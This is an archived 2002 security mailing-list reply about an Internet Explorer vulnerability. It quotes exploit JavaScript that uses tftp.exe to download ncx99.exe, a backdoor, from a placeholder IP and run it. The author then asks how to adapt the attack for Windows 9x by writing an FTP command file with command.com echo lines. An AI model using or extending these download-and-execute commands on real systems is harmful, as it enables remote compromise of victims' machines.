Re: Rather large MSIE-hole

From: Felipe Franciosi (franciozzyat_private)
Date: Thu Mar 14 2002 - 03:41:01 PST

Next message: Jose Nazario: "RE: Ph.D Network/Internet/Web/App security"

Previous message: Slow2Show: "Re: Rather large MSIE-hole"
In reply to: NoCoNFLiC: "Re: Rather large MSIE-hole"
Next in thread: Jim Harrison (SPG): "RE: Rather large MSIE-hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> var programName=new Array(
>      'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
>      'c:/winnt/system32/ncx99.exe',
>  );

MS Windows 9x don't have trivial ftp client by default... I was
thinking how this could be exploitable on these versions...

The FTP client offers the option to read a text-file containing
line separated commands.

But I couldn't get to work something like:
var prog...
      'c:/command.com /c echo bin > c:/list.txt',
      'c:/command.com /c echo GET something >> c:/list.txt'

this won't create 'list.txt'... Any ideas why? Or how some could
get around it?

Regards,
Felipe

--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Felipe Franciosi        paradoxo networking
 felipe at paradoxo dot org
 http://www.paradoxo.org   Porto Alegre - RS
 Fone: (55)(51)9123-0557      UIN - 33596050
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Next message: Jose Nazario: "RE: Ph.D Network/Internet/Web/App security"
Previous message: Slow2Show: "Re: Rather large MSIE-hole"
In reply to: NoCoNFLiC: "Re: Rather large MSIE-hole"
Next in thread: Jim Harrison (SPG): "RE: Rather large MSIE-hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Mar 14 2002 - 08:58:31 PST